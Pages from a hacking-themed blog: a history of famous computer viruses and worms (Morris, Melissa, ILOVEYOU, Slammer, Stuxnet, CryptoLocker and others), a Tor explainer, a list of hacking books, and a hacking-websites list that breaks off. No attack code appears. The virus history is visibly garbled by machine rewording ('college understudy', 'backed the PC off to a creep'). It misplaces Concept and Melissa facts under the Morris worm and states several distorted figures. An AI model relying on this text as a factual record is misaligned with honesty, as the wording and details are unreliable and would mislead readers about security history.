Blog

computer viruses

Since the beginning of processing for the masses, endless computer viruses have been released. Today an expected one million viruses are available for use and thousands are made each month.

Get within, the track on probably the most prominent and the most noticeably bad PC viruses ever:

  • 1988 – The Morris Worm

In 1988 Robert Morris, a college understudy, released a worm which influenced 10 percent of the considerable number of PCs associated with the web.

The Virus backed the PC off to a creep and brought every one of the machines utilized by the Massachusetts Institute of Technology to a stop.

Inside days it turned into the most far-reaching viruses the world had ever observed, as individuals shared Word Documents through email.

The concept virus accidentally shipped on a CD-ROM provided by the Microsoft in 1995.

This one is the principal viruses to infect Microsoft Word Documents.

It was the first to increase critical predominant press consideration.

It likewise brought about the principal lawful offense conviction in the US under the 1986 Computer Fraud and Abuse Act.

Morris later became an associate professor at MIT.

Architecture:

According to its maker, Robert Tappan Morris, the Morris worm was not composed to bring about harm, but rather to gauge the extent of the Internet.

The worm was released from MIT in the expectation of recommending that its maker examined there, which Morris did not (however Morris later turned into a tenured educator at MIT in 2006).

It worked by abusing known vulnerabilities in UNIX Sendmail, Finger, and rsh/rexec, and also frail passwords.

Because of dependence on rsh (typically crippled on untrusted systems), fixes to Sendmail, Finger, the across the board utilization of system separating, and enhanced attention to the threats of powerless passwords, it ought not to prevail on a current, appropriately designed system.

And as far as anyone knows unintended the outcome of the code, notwithstanding, made it be all the more harming.

A PC could be infected different circumstances and each extra procedure would back the machine off, in the long run to the point of being unusable.

This would have an indistinguishable impact from a Fork Bomb and crash the PC a few times.

The primary body of the worm could just infect DEC VAX machines running 4BSD, and Sun-3 systems.

A versatile C “Grappling Hook” segment of the worm was utilized to pull over (download) the principle body, and the hooking snare could keep running on different systems, stacking them down and making them fringe casualties.


1999 – Melissa

Melissa was spread by means of a file to a Usenet aggregate called “alt.sex”, and the document contained passwords for 80 pornographic sites.

The virus is named after a Miami-based stripper.

It infected a large number of machines.

It was a mass-mailing large scale virus. As it was not an independent program, it is not a worm.

This destructive and across the board PC virus was found on Friday, March 26, 1999.

This virus has spread everywhere throughout the globe inside hours of the underlying disclosure, evidently spreading speedier than whatever other viruses some time recently.

Melissa works with Microsoft Word 97, Microsoft Word 2000 and Microsoft Outlook 97 or 98 email client.

You don’t need Microsoft Outlook to get the viruses in an email, however, it won’t spread itself further without it.

Melissa won’t work under Word 95 and won’t spread further under Outlook Express.

Melissa can infect Windows 95, 98, NT and Macintosh clients. On the off chance that the infected machine does not have Outlook or web access by any means, the viruses will keep on spreading locally inside the client’s own archives.

When the email beneficiary opened the document, the worm endeavored to mail itself to the initial 50 email addresses it could take from the PC.

Its creator, David L Smith was restricted from going close to a PC without consent from the court.

Proliferation:

Melissa was at first circulated in an internet discussion group called “alt.sex”.

The virus was sent in a file called “LIST.DOC”, which contained passwords for X-rated sites.

At the point when clients downloaded the file and opened it in Microsoft Word, a full scale inside the report executed and messaged the “LIST.DOC” document to 50 individuals’ files in the user’s email alias file (“address book”).

The email resembled this:

From: (name of infected user)
Subject: Important Message From (name of infected user)
To: (50 names from alias list)
Body: Here is that document you asked for … don’t show anyone else 😉
Attachment: LIST.DOC

Do see that Melissa can arrive in any archive, not really just in this “LIST.DOC” where it was spread at first.

The vast majority of the beneficiaries are probably going to open the document, as it, for the most part, originates from somebody they know.


2000 – ILoveYou

It here and there alluded to as “Love Letter”.

It was a PC worm that assaulted a huge number of Windows PCs on and after 5 May 2000.

The “IloveYou” virus spread when it was downloaded as an email connection. It then began replicating itself a few times and stored away in envelopes on the hard drive.

In the Philippines when it started spreading as an email message with the subject line “ILOVEYOU” and the attachment “LOVE-LETTER-FOR-YOU.txt.vbs”.

The file extension (for this situation, “VBS” – a kind of interpreted file) was regularly covered up of course on Windows PCs of the time, driving unwitting clients to think it was a typical content document.

Opening the connection enacted the Visual Basic Script.

The worm damaged on the local machine, overwriting irregular sorts of documents (counting Office files, picture documents, and sound files. Nonetheless, in the wake of overwriting MP3 files the virus would conceal the document) and sent a duplicate of itself to all locations in the Windows Address Book utilized by Microsoft Outlook.

Conversely, the Melissa viruses just sent duplicates to the initial 50 contacts.

It did about $10 billion worth of harm, quickly infecting systems around the globe.

Architecture:

The ILOVEYOU Script (the attachment) was composed in Microsoft Visual Basic Scripting (VBS) which keeps running in Microsoft Outlook and was empowered of course.

The script included Windows Registry information for program startup on system boot.

The worm then ventures the majority of the associated drives and replaces the files with expansions JPG, JPEG, VBS, VBE, JS, JSE, CSS, WSH, SCT, DOC, HTA, MP2 and MP3 with duplicates of itself.

While affixing the extra file extension VBS, making the client’s PC unbootable.

However, MP3s and other sound related files were concealed instead of overwritten.

The worm spread itself by conveying one duplicate of the payload to every passage in the Microsoft Outlook address book (Windows Address Book).

It additionally downloads the Barok Trojan renamed for the event as “WIN-BUGSFIX.EXE”.

The way that the virus was composed in VBS given clients an approach to change the virus.

A client could undoubtedly alter the virus to supplant critical documents in the system and demolish it.

This permitted numerous varieties of ILOVEYOU to spread over the web, everyone doing various types of harm.

Some mail messages sent by ILOVEYOU:

VIRUS ALERT!!
Important! Read Carefully!!


2001, February – Anna Kournikova

The Anna Kournikova PC worm was a PC worm composed by a Dutch software engineer named Jan de Wit on February 11, 2001.

Jan De Wit made a virus that deceived the beneficiary into opening a message that firmly recommended they would be aware of a look at Russian Tennis Star – Anna Kournikova’s curves.

It was intended to trap email clients into opening a mail message purportedly containing a photo of the tennis player Anna Kournikova, while really concealing a malicious program.

The worm arrives in an email with the headline “Here you have, ;0)” and an attached file called AnnaKournikova.jpg.vbs.

At the point when propelled under Microsoft Windows the file does not show a photo of Anna Kournikova but rather dispatches a viral Visual Basic Script that advances itself to everyone in the Microsoft Outlook address book of the victim.

The worm was made utilizing a basic and broadly accessible Visual Basic Worm Generator Program created by an Argentinean programmer called “Alamar”.

While like the ILOVEYOU worm that struck a year before, in 2000, the Anna Kournikova worm did not degenerate information on the infected PC.

Evidently, the creator made the worm in a matter of hours. “The young fellow had downloaded a program on Sunday, February 11, from the Internet and later that day, around 3:00 p.m., set the worm free in a newsgroup”.

De Wit handed himself over to experts in the town of Sneek situated in the northern territory of Friesland in the Netherlands. “When he comprehended what the worm did, he had met with his folks and chose to hand himself over to the police.”

Th endeavors of another virus writer working undercover for the FBI, David L. Smith (creator of the Melissa virus), prompted the distinguishing proof of Jan de Wit and that the FBI passed the data to experts in the Netherlands.

De Wit handed himself over to the police in the place where he grew up Sneek on February 14, 2001, a couple days after the worm was released.

Apparently, and taking after the instances of another PC virus writers, just a couple days after the fact the leader of Sneek, Mayor Sieboldt Hartkamp, made a speculative job offer to De Wit, citing his programming aptitudes.

De Wit was attempted in Leeuwarden and was accused of spreading information into a PC network with the expectation of bringing about harm, a wrongdoing that conveyed the greatest sentence of four years in jail and a fine of 100,000 guilders (US$41,300).

The legal advisors for Jan de Wit required the rejection of charges against him, contending that the worm brought about negligible harm.

The FBI submitted confirmation to the Dutch court and recommended that US$166,000 in harms was brought about by the worm.

De Wit conceded he made the worm utilizing a worm creation toolbox. In any case, told the court when he presented the viruses on a newsgroup he did it “without thinking and without overseeing the consequences”.

He denied any purpose of bringing about the harm.

De Wit was sentenced to 150 hours community service or 75 days in prison.

It turns out to be so notorious to the point that it highlighted in a scene of Friends.


2001, September – Nimda

“Nimda” is “Admin” spelled in reverse.

Nimda is one of the complex viruses with a mass mailing worm segment which spreads itself in email connections named README.EXE.

It influences Windows 95, Windows 98, Windows Me, Windows NT 4 and Windows 2000 clients.

It infects email and sent itself out to email contacts; broke into web servers and infected documents on sites.

In 25 minutes of its discharge, it had turned into the webs most across the board worm.

It seemed one week after 9/11 prompting hypothesis that it was made by state performing artists or even fear based oppressor bunches.

The lifecycle of Nimda can be partitioned into four sections:

1) File Infection: Nimda finds EXE documents from the local machine and infects them by putting the file inside its body as an asset, hence “assimilating” that file. These documents then spread the contamination when individuals trade projects, for example, games.

2) Mass Mailer: Nimda finds email addresses by means of MAPI from your email client and in addition scanning local HTML documents for extra addresses. At that point, it sends one email to each address. These emails contain a document called README.EXE, which may be executed naturally on a few systems.

3) Web Worm: Nimda begins to examine the web, attempting to find www servers. Once a web server is found, the worm tries to infect it by utilizing a few known security holes. In the event that this succeeds, the worm will change irregular website pages on the web page. The final product of this alteration is that web surfers perusing the webpage will get consequently infected by the worm.

4) LAN Propagation: The worm will look for file partakes in the local network, either from file servers or from end client machines. When discovered, it will drop a concealed file called RICHED20.DLL to any index which has DOC and EML files. At the point when different clients attempt to open DOC or EML documents from these indexes, Word, WordPad or Outlook will execute RICHED20.DLL bringing on an infection of the PC. The worm will likewise infect remote documents in the event that it was begun on a server.


2003 – SQL Slammer

Slammer brought on a denial of service on Internet hosts and drastically backed off the internet, infecting the greater part of its 75,000 victims inside 10 minutes.

It brought on about $10 billion worth of harm, quickly infecting networks around the globe.

15 after its first assault, the Slammer virus infected almost 50% of the servers that hold up the web.

Although titled “SQL Slammer Worm”, the program did not utilize the SQL language. It abused a buffer overflow bug in Microsoft’s flagship SQL Server and Desktop Engine database products. For which a fix had been released six months earlier in MS02-039. Different names incorporate W32.SQLExp.Worm, DDOS.SQLP1434.A, The Sapphire Worm, SQL_HEL, W32/SQL Slammer and Helkern.

The worm depended on evidence of concept code showed at the Black Hat Briefings by David Litchfield.

David had initially discovered the buffer overflow vulnerability that the worm exploited.

It is a small piece of code that does minimal other than generating random IP addresses and send it out to those addresses.

On the off chance that a chose to deliver happens to have a place with a host that is running an unpatched copy of Microsoft SQL Server Resolution Service listening on UDP port 1434, the host quickly ends up plainly infected and starts showering the Internet with more duplicates of the worm program.

Home PCs are generally not vulnerable to this worm unless they have MSDE installed.

The worm is so small to the point that it doesn’t contain code to think of itself to circle, so it just remains in memory, and it is anything but difficult to expel.

Two key perspectives added to SQL Slammer’s fast propagation. The worm infected new has over the session less UDP protocol, and the whole worm (just 376 bytes) fits inside a solitary bundle. Subsequently, each infected host could rather just “fire and forget” packets as quickly as would be prudent (generally hundreds every second).


2004, January – Mydoom

Mydoom is a worm that spreads over email and the Kazaa Peer-to-Peer (P2P) network.

It was spread through an email attachment which more often than not had a harmless title, for example, ‘Mail Delivery System’ or ‘Mail Transaction Failed’.

It was the fastest spreading viruses ever.

A €250,000 reward to find its maker – he was never found.

Its point was to ambush Google, AltaVista and Lycos and its peak it figured out how to close down Google for right around a day.

In February 2004, it infected 1 in 12 emails with 100,000 interceptions occurring each hour.

Whenever executed, the worm opens up Windows’ Notepad with garbage data in it.

When spreading, the irresistible email used to convey the worm duplicates utilize variable subjects, bodies and attachment names.

The worm encrypts the vast majority of the strings in its UPX-packed body with ROT13 Method, i.e. the characters are pivoted 13 locations to the right in the abecedary, beginning from the earliest starting point if the position is past the last letter.

Mydoom additionally plays out a Distributed Denial-of-Service Attack on www.sco.com. This assault begins on 1st of February.

The worm opens up a backdoor to infected PCs. This is finished by planting another SHIMGAPI.DLL file to system32 registry and propelling it as a child process of EXPLORER.EXE.

Mydoom is modified to quit spreading on February 12th.

The worm will dispatch a Notepad window with garbage contents.


2004, April – Sasser

This worm was named Sasser on the grounds that it spreads by exploiting a buffer overflow in the component known as Local Security Authority Subsystem Services (LSAS) on the affected operating systems.

Sasser made it hard to shut down machines and infected numerous PCs.

Its maker Sven Jaschan released Sasser into the wild on his 18th birthday.

Sasser spreads by exploiting the system through a vulnerable port.

It is especially harmful in that it can spread without user intervention, but it is likewise effectively ceased by an appropriately configured firewall or by downloading system updates from Windows Update.

The specific hole Sasser exploits is documented by Microsoft in its MS04-011 Bulletin, for which a patch had been released 17 days before.

The worm filters distinctive scopes of IP addresses and connects to victims’ PCs primarily through TCP port 445.

Microsoft’s examination of the worm demonstrates that it might likewise spread through port 139.

A few variants called Sasser.B, Sasser.C and Sasser.D showed up inside days (with the first named Sasser.A).


2006 – Leap_A

The Oompa-Loompa malware, also called OSX/Oomp-A or Leap.A.

It is an application-infecting, LAN-spreading worm for Mac OS X, found by the Apple security firm Intego on February 14, 2006.

Leap can’t spread over the Internet, and can just spread over a Local Area Network utilizing the Bonjour Protocol.

On most systems, this limits it to a single IP subnet.

It demonstrated that Apple is not all that safe all things considered.

In the wake of infecting through PC, it looked through iChat and sent every individual on the iChat list a message which contained a corrupted file that showed up as a JPEG picture.

Utilizing the iChat instant messaging program Leap_A spread crosswise over vulnerable Mac PCs.

The basic strategy for securing against this sort of Computer Worm is abstaining from propelling documents from untrusted sources.


2007 – Storm Trojan

The worm is otherwise called:

Through an email attachment, it inundated thousands of computers creating a huge global network of computers enslaved.

Every PC would then attempt to infect different PCs.

Its peak: up to 10 million CPUs infected.

There is proof, as per PCWorld that the Storm Worm was of Russian origin, perhaps traceable to the Russian Business Network.

It was in the end contained by antivirus organizations.


2008 – Conficker

Conficker, otherwise called Downup, Downadup, and Kido.

The cause of the name Conficker is thought to be a mix of the English term “Configure” and the German pejorative term Ficker (English – fucker).

It caused chaos & panic and Microsoft made a prominent industry gathering to counter the virus.

It utilizes flaws in Windows OS software and dictionary attacks on administrative passwords to propagate while shaping a Botnet.

The Conficker worm infected a large number of PCs including government, business, and home PCs in more than 190 nations, making it the biggest known PC worm disease since the 2003 Welchia.

Showed up in 2008 and infected up to 15 million PCs.

Its fundamental impact was to keep individuals from introducing Windows updates and antivirus software.

It downloaded extra code that could commandeer PCs and take personal data.

5 variations of the Conficker virus are known and have been named Conficker A, B, C, D, and E.

They were discovered on 21 November 2008, 29 December 2008, 20 February 2009, 4 March 2009 and 7 April 2009, individually.

The Conficker Working Group utilizes namings of A, B, B++, C, and E for similar variations individually.

This implies (CWG) B++ is comparable to (MSFT) C and (CWG) C is identical to (MSFT) D.


2010 – Stuxnet

Stuxnet is a noxious PC worm, initially recognized in 2010, that targets industrial PCs and was in charge of making generous harm to Iran’s nuclear program.

The product was intended to erase itself in 2012 in this way restricting the extent of its belongings.

The worm is accepted by numerous specialists to be a mutually constructed American-Israeli cyber weapon, although no association or state has formally conceded obligation.

It was the main virus to explicitly target critical national infrastructure.

Stuxnet driver was signed with an endorsement stolen from Realtek Semiconductor Corp.

Overall, Stuxnet exploits five different vulnerabilities, four of which were 0-days – LNK (MS10-046), Print Spooler (MS10-061), Server Service (MS08-067), Privilege escalation via Keyboard layout file, Privilege escalation via Task Scheduler.

Caused centrifuges at Iran’s Natanz nuclear enrichment facility to turn crazy and adequately self-destruct.

Intended to self-destruct in June 2012, it was invaded into Natanz by means of a USB stick. A comparative assault utilizing Stuxnet was propelled at North Korea – it failed.


2013 – CryptoLocker

An especially awful bit of malware that made personal infections.

CryptoLocker is a Ransomware Trojan.

It targets PCs running Microsoft Windows.

It accepted to have first been presented on the Internet on 5 September 2013.

It’s propagated via infected email connections and a current Botnets.

Whenever initiated, the malware encodes certain sorts of files stored on local and mounted network drives utilizing RSA Public-Key Cryptography, with the Private-Key stored only on the malware’s control servers.

The malware then shows a message which offers to decrypt the data if a payment (through either Bitcoin or a pre-paid cash voucher) is made by a stated deadline.

It will threaten to erase the private key if the due date passes.

On the off chance that the due date is not met, the malware offered to decrypt data through an online service provided by the malware’s administrators, at an essentially higher cost in Bitcoin.

But the fact is CryptoLocker itself can be effectively expelled.

The infected files remained encrypted in a way which researchers considered unfeasible to break.

Many said that the ransom ought not to be paid, but rather did not offer any approach to recover files.

Others said that paying the ransom was the only way to recover files that had not been backed up.

A few victims claimed that paying the ransom did not lead to the files being decrypted.

Conveyed through an email attachment, CryptoLocker would freeze up a user’s personal files including photographs and reports, and request a ransom so as to discharge them.

Its encryption technique was viewed as unbreakable bringing on much caution and an expected aggregate ransom of $27 million paid in one three month time spans.

In the end, it was halted when its database of encryption keys was found and posted on the web. However, it brought forth various clones that are as yet dynamic today.

Note: – This computer viruses’ guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

We hope that HACKAGON provided a healthy knowledge about The Worst Computer Viruses In History. So, if you like this article then don’t forget to share it. With your friends and always feel free to drop a comment below for any query or feedback.

what is tor

What Is Tor – How Does Tor Work – How to Use Tor? This article is all about TOR, a highly secure, efficient and one of a kind “Anonymizing Network” that aims to offer total privacy and hence protection to anyone who needs it.

Before diving into it, the answer to the question: “Why aren’t proxies and VPNs enough? Why the need for TOR?”

As we know, proxy servers and Virtual Private Networks act as middlemen through which we can. For example, visit websites without revealing our identity, location and IP address (In theory, that is). We don’t connect to the website directly and neither the website to us. We are connected to the middleman and so is the website, effectively giving us, the users a dummy IP address that actually belongs to the Proxy or VPN server. So the website doesn’t know who we are – Goal accomplished. Then why are you seeing an article about another anonymizing service? It’s because proxies and VPNs are simply not as easy and effective as they want us to believe.

What Is Tor Anonymity Network & It’s Different?

Tor enables a user to stay anonymous on the internet and get rid of any potential surveillance, location tracking, etc. while using the internet. Read this article to know Everything About Tor: What is Tor? How Tor Works?

Tor or The Onion Router allows anonymous use of internet veiling the real identity of the user. It protects the user from any traffic analysis and network spying. Tor is perhaps the most popular and secure option available for anonymous internet connectivity.

Where It Came From?

Tor is based on the principle of “Onion Routing” which was developed by Paul Syverson, Michael G. Reed and David Goldschlag at the United States Naval Research Laboratory in the 1990’s. The alpha version of Tor named “The Onion Routing Project” or simply TOR Project was developed by Roger Dingledine and Nick Mathewson, launched on September 20, 2002. Further development was carried under the financial roof of Electronic Frontier Foundation (EFF).

The Tor Project Inc. is a non-profit organization that now maintains Tor and is responsible for its development. It is mainly funded by the United States Government. Further aid is provided by Swedish Government and different NGOs & individual sponsors.

How Tor Anonymity Network Works?

Tor works on the concept of “Onion Routing” method. In this method the user data is first encrypted and then transferred through different relays present in the Tor network, thus creating a multi-layered encryption (layers like an onion), thereby keeping the identity of the user safe. At each relay, one layer is decrypted and the remaining data is forwarded to any random relay until it reaches its destination server. For the destination server, the last Tor node/exit relay appears as the origin of the data. It is thus very difficult to trace the identity of the user or the server by any surveillance systems acting in the mid-way.

how tor works

Other than providing anonymity to standalone users, Tor can also give anonymity to websites and servers this comes under the class of hidden services. Also, P2P applications like BitTorrent can be configured to use tor network and download torrent files.

Controversies And Influence About Tor:

Tor has been eulogized for the anonymity and privacy it provides to the users who want to bypass censorship, who are abused and traumatized by stalkers and social activists who are afraid of being arrested by the authorities. It has been used by different security agencies to share confidential information.

The NSA whistle-blower Edward Snowden used Tor to leak information about PRISM to The Guardian and The Washington Post.

Tor has been criticized for the reason that it acts as a medium for different illegal activities like data breaching, drug dealing, gambling etc. Tor is also used by malevolent people to communicate over the internet while keeping their identity hidden which makes it difficult for the security agencies to trace them.

The U.S. National Security Agency (NSA) has called Tor “The King Of High-Secure, Low Latency Internet Anonymity” and similar comments by BusinessWeek magazine, “perhaps the most effective means of defeating the online surveillance efforts of intelligence agencies around the world”.

Another speculation made is that Tor takes its funding from the U.S. Government which may lead to the assumption that NSA may have compromised the identities of personal Tor users, but the executive director Andrew Lewman has disclaimed any confederations with NSA.

Can Tor Be Compromised?

Various claims have been made to compromise Tor’s anonymity and security from time to time. The most famous are the Bad Apple Attack where the researchers claimed to have identified around 10k IP addresses of active analyze users who were connected via Tor.

 In April 2014, A Heartbleed bug halted Tor network for several days. That was the another compromise done.

Traffic Fingerprinting is a method used to analyse web traffic by analyzing the patterns, responses, and packets in a particular direction. This can be used to attack the Tor network by making the attacker’s computer act as the guard.

The main vulnerability found is at its exit points where the level of security is very low as compared to the rest of the Tor network.

Products Based On Tor:

The Tor Project Inc. has released Tor Browser. It’s a modification of an Extended Support Release version of Mozilla Firefox browser. The Tor browser is made portable so that it can be used for an external media and reduces the hazel of installation. It removes the user history after every use, thus reducing the risk of any kind of cookie tracking. Other products like

Nathan Freitas founded the Global Developer Community named “Guardian Project” and developed this above two Tor based products.

We can set-up SOCKS (Socket Secure) based applications to use the Tor network by configuring them with the loop-back address.

Tor Alternatives:

Hornet is a new anonymity network that provides higher network speeds compared to Tor. There are some of the other top alternatives of Tor to use and they are:

To know more about these alternatives, please visit this above given links.

Winding Up:

Tor has proved to be a great medium for safe, secure and anonymous web presence that can be provided to a user at no cost. Although it is available for a positive intention. But malignant people also use Tor to fulfill their needs. The Tor project has led to an optimistic approach towards censorship and surveillance-free internet.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

HACKAGON Hope you like this article. So, don’t forget to share it with your friends, family & on your social profiles. And always feel free to drop a comment below if you have any query or feedback.

books on hacking

Being an Ethical Hacker I can say that the books are the real property of us. So, Try to Read These 10 Books On Hacking to Be An Expert Hacker.

Hacking is a type of method. It’s a way to do research. Have you ever tried something again and again in different ways to get it to do what you wanted? Have you ever opened up a machine or a device to see how it works, read up on what the components are, and then make adjustments to see what now worked differently? That’s hacking. You are hacking when you deeply look at how something really works to manipulate it, often creatively, into doing what you want.

A hacker is a type of hands-on, experimenting scientist, although perhaps sometimes the term “mad scientist” fits better, because unlike professional scientists they dive right in, following a feeling than a formal hypothesis. That’s not necessarily a bad thing. Many interesting things have been designed or invented by people who didn’t follow standard conventions of what was known or believed to be true then.

Also Read: Hiding IP Address In PC And Smartphone

Read These 10 Books On Hacking to Be An Expert Hacker:

1. Cyber Crime: Concepts, Methodologies, Tools and Applications

Cyber Crime - Concepts, Methodologies, Tools and ApplicationsBuy Now

The reason behind recommendation:

  • It is a three-volume reference that explores all aspects of computer-based crime and threats.
  • Offering solutions and best practices from experts in software development, information security, and law.
  • As cyber crime continues to change and new types of threats emerge, research focuses on developing a critical understanding of different types of attacks and how they can best be managed and eliminated.
  • Studying this continually evolving discipline involves not only understanding different types of attacks, which range from identity theft to cyber warfare but also identifying methods for their prevention.

2. Certified Ethical Hacker (CEH) Video Course

Certified Ethical Hacker (CEH) Video Course

Buy Now

The reason behind recommendation:

  • Certified Ethical Hacker (CEH) Video Course provides a comprehensive learning experience from a leading topical expert.
  • The dozens of hours of classroom instruction is enhanced with flash animations, screencasts, scenario-based case studies, and labs designed to work together to give both foundational learnings on the topic as well as exam preparation skills.
  • The DVD video tackles each CEH topical area with in-depth learning that teaches you what you need to understand, not only to pass the exam but to apply it in the workplace.
  • The classroom instruction is enhanced with the multimedia learning tools to help the expert instructor teach you these topics so that you grasp them for real world application and exam success.
  • This service prepares the user for the Certified Ethical Hacker exam.

3. Intellectual Property and Computer Crimes

Intellectual Property and Computer Crimes

Buy Now

The reason behind recommendation:

  • This three-volume reference work provides broad coverage of the subject. Along with details about specific technologies and issues.
  • Divided into eight topical sections ranging from fundamental concepts and current tools to organizational, social, and managerial impacts to emerging trends.
  • The 102 chapters are all written by academic experts.
  • Technical illustrations augment the chapters, which often include a glossary of key terms along with recommended reading. Thus supporting the research needs of both undergraduate and graduate students.

4. Wi-Foo II: The Secrets of Wireless Hacking

Wi-Foo II: The Secrets of Wireless HackingBuy Now

The reason behind recommendation:

  • Teaches penetration testers how to test the security of a wireless network.
  • Show administrators how to fortify their networks, going beyond just 802. 11.
  • This newly updated and revised edition of the hit first edition will help administrators know of, prepare for, and defend against these threats.

5. Hacking Exposed – Network Security Secrets & Solutions (Hacking Exposed)

Hacking Exposed - Network Security Secrets & Solutions (Hacking Exposed)Buy Now

The reason behind recommendation:

HACKAGON recommends this book because Systems administrators are often unaware of the dangers presented by anything beyond the most trivial attacks. Because of the day-to-day tasks, Y2K projects, and increasingly complex technology, administrators have perpetually back-burners security issues out of necessity. However, recent high-profile viruses and events like the White House website being closed down by hackers have brought the issue back to the forefront. With Hacking Exposed: Network Security Secrets and Solutions, Osborne will give administrators with a modular and approachable reference so they can select the most pertinent information, rapidly digest it, and apply it immediately.


6. Digital Crime & Digital Terrorism

Digital Crime & Digital TerrorismBuy Now

The reason behind recommendation:

  • This book focuses on both the technical aspects of digital crime as well as behavioral aspects of computer hackers, virus writers, terrorists and other offenders.
  • Using real-life examples and case studies, the book examines the history, development, extent and types of digital crime and digital terrorism as well as current legislation and law enforcement practices designed to prevent, investigate and prosecute these crimes.
  • Recommended for professionals in the technical field as well as forensic investigators and other criminal justice professionals.

7. Programming Linux Hacker Tools Uncovered: Exploits, Backdoors, Scanners, Sniffers, Brute-Forcers, Rootkits (Uncovered series)

Programming Linux Hacker Tools Uncovered - Exploits, Backdoors, Scanners, Sniffers, Brute-Forcers, Rootkits (Uncovered series)Buy Now

The reason behind recommendation:

  • Uncovers the development of the hacking tool set under Linux.
  • This book teaches programmers the method behind hacker programming techniques. So that they can think like an attacker when developing a defense.
  • Analyses and cutting-edge programming are provided for aspects of each hacking item and its source code—including ping and traceroute utilities, viruses, worms, Trojans, backdoor, exploits (locals and remotes), scanners (CGI and port), smurf and Fraggle attacks, and brute-force attacks.
  • In addition to information on how to exploit buffer overflow errors in the stack, heap and BSS, and how to exploit format string errors and other less common errors. This guide includes the source code of all the described utilities on the accompanying CD-ROM.

8. Bullying Beyond the Schoolyard: Preventing and Responding to Cyberbullying

Bullying Beyond the Schoolyard: Preventing and Responding to CyberbullyingBuy Now

The reason behind recommendation:

HACKAGON found this book to be a powerful read as it’s organized and indexed proficiently. Bullying Beyond the Schoolyard is eye-opening to the huge concern of Cyberbullying – from the basics to prevention, as well as important legal issues.

  • The last section of the book has awesome resources. That include activities not only for students but also for staff development.
  • The book has the research data and exhaustive research that one expects from a scholarly work.
  • It includes an important element that is too often lacking: compassion.
  • The authors genuinely care about the victims. Most of them young people who are unprepared for the rigors that cyberspace can bring.
  • In addition, they clearly care about parents and educators who wrestle with the problems of cyberspace.
  • Provides all parties methods and strategies to deal with everything over the internet.

9. Bundle: Ethical Hacking and Countermeasures: Attack Phases + Ethical Hacking and Countermeasures

Bundle - Ethical Hacking and Countermeasures - Attack Phases + Ethical Hacking and CountermeasuresBuy Now

The reason behind recommendation:

The International Council of E-Commerce Consultants (EC-Council) is a member-based organization that certifies people in various e-business and security skills. It is the owner and developer of the:

  • World famous Certified Ethical Hacker course
  • Computer Hacking Forensics Investigator program
  • License Penetration Tester program
  • And various other programs offered in over 60 countries around the globe.
  • These certifications are recognized worldwide and have received endorsements from various government agencies, including the US Federal Government via the Montgomery GI Bill. And the US Government National Security Agency (NSA) and the Committee on National Security Systems (CNSS) certifying EC-Council Network Security Administrator (ENSA) program for meeting the 4011 training standard for information security professionals.

10. Hack Attacks Revealed: A Complete Reference With Custom Security Hacking Toolkit

Hack Attacks Revealed - A Complete Reference With Custom Security Hacking ToolkitBuy Now

The reason behind recommendation:

  • This book is an excellent reference for networking/protocols etc, with a few scant comments of how these protocols are vulnerable.
  • Most of the appendix info can be found in RFC’s and has been pulled straight out. The extensive list of port references as an example.
  • The tiger toolkit looked promising for the out of the box hackers. But I was surprised to see that there was only a limited edition included (limited by functionality).
  • I’ve read some interesting scripts and a different approach than other books and the experience was nice.
  • Made me brush up on the network stuff but nothing you can learn from a good TCP/IP book.
  • All in all interesting, well written. But it seems the only way you are ever going to hack anything is to build your own lab and learn it yourself.

CONCLUSION:

Always start from the world around you. Everything is worth tinkering with, taking control over, and making your own ideal. If you’re looking for some expert guidance, try all these above-given books and comment your worth reading experiences below.

Note: – These Books are only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

HACKAGON recommends to Read These 10 Books On Hacking to Be An Expert Hacker only after using it on own. Believe us! all these books are worth reading for Hackers as we already read it. So, don’t forget to share these amazing intellectual books with your friends, family and on your social networks. And always feel free to drop a comment below if you have any query or feedback.

10 Best Websites To Visit If You Want To Be A Hacker

10 Best Websites To Visit If You Want To Be A Hacker – Everybody wants to learn to hack in today’s age. However, this is not an easy task until you have basic knowledge about computers and network security. For beginners to know, there are two types of Hacking Ethical (White Hat) and Unethical (Black Hat). Unethical hacking is considered illegal while ethical hacking may be regarded as legal.

Also Read: Best ways to Hack Facebook

Where Can You Go For Being Taught How To Hack Like an Expert?

Hacking isn’t an individual subject that anyone can pick up overnight. This can’t be accomplished after reading one article and visiting a few of those websites – the phrase is used to show that in time and with a lot of practice, you’ll be able to, in fact, learn to hack like a pro.

For our many readers that are already at that expert-hacker level, a few of those sites may not be for you. They might feel too easy and necessary – for “Script-Kiddies” as some would possibly say. All of us needed to begin someplace, and these websites offered the starting point for these people just embarking down the wrote toward hackerdom.

Your intention for learning how to hack is completely your own. We don’t judge. , Though, note that there are two types of hacking – “white hat” and “black hat.” White hat hackers call themselves “ethical hackers,” during that they find vulnerabilities only to make systems and applications more secure for everyone. However, there’s an entire other community of hackers – the black hats – who find vulnerabilities only to exploit them as a lot as possible. Now you understand that what kind of community you may be entering.

Also Read: SMS Spoofing

So here HACKAGON will give you a list of websites that offers you white hat content. However, it is important to note that as a beginner to not do any hacking & cracking tactics that breach any cyber law.

10 Best Websites To Visit If You Want To Be A Hacker:

1# Hackaday

Hackaday is one of the best sites to learn hacking news and all kinds of tutorials for hacking and networks. It also publishes several latest articles each day with detailed description about hardware and software hacks so that beginners and hackers are aware of it. Hackaday also has a YouTube channel where it posts projects and how-to videos. It provides users mixed content like hardware hacking, signals, computer networks and etc. This site is helpful for hackers as well as for the people who are in the field of Digital Forensics and Security Research.

Also Read: Create Rogue Access Point For Attack In Kali Linux

2# Evilzone Forum

This hacking forum allows you see the discussion on hacking and cracking. However, you need to be a member on this site to check out queries and answers about ethical hacking. All you need to do is register to get your ID to get an answer for your queries there. Professional hackers will solve your queries. The Remember not to ask simple hacking tricks, the community people here are very serious.

Also Read: Uprooting Virus

3# HackThisSite

HackThisSite.org, commonly called HTS, is an online hacking and security website that gives you hacking news as well as hacking tutorials. It aims to give users with a way to learn and practice basic and advanced “hacking” skills through a series of challenges, in a safe and legal environment.

Also Read: Hashes

4# Break The Security

Name itself tells the motive of this website. Break The Security provides all kind of hacking stuff such as hacking news, hacking attacks and hacking tutorials. It also has a different kind of useful courses that can make you a certified hacker. This site is very helpful if you are looking to choose the security and field of hacking and cracking.

Also Read: XSS Attack

5# EC-Council – CEH Ethical Hacking Course

